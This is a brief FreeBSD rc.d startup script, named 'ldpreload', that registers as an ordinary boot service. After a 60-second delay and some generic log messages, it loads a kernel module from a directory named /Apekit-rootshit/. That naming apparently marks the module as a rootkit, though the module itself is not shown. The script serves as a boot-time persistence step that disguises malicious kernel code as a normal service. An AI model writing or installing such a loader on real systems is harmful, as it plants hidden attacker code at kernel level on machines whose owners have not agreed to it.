#!/bin/sh
#
# PROVIDE: ldpreload
# REQUIRE: DAEMON
# KEYWORD: shutdown
#
. /etc/rc.subr

name="ldpreload"
start_cmd="ldpreload_start"

ldpreload_start() {
    echo "Sleeping for 60 seconds..." >> /var/log/myscript.log
    sleep 60
    echo "Executing my command now!" >> /var/log/myscript.log
    /sbin/kldload /Apekit-rootshit/LD_PRELOAD.ko
}

load_rc_config $name
run_rc_command "$1"
